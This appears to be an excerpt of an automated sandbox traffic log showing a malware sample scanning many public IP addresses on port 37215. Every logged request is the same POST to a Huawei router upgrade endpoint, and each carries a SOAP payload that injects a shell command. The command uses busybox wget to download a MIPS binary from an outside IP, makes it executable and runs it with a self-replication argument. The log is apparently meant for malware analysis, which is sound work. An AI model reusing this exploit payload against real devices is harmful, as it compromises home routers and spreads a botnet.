                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        893192.168.2.2357652197.224.123.13137215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490004063 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        894192.168.2.233333441.10.7.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490019083 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        895192.168.2.2333304197.208.73.24037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490031958 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        896192.168.2.2340250157.11.143.437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490034103 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        897192.168.2.2334718157.193.147.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490196943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        898192.168.2.2348392157.66.235.14437215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490200996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        899192.168.2.2348924157.220.17.3037215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490200996 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        900192.168.2.2354944109.81.123.13737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490252018 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        901192.168.2.235707041.205.171.21637215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490277052 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        902192.168.2.2351134157.170.126.12937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:07.490298986 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
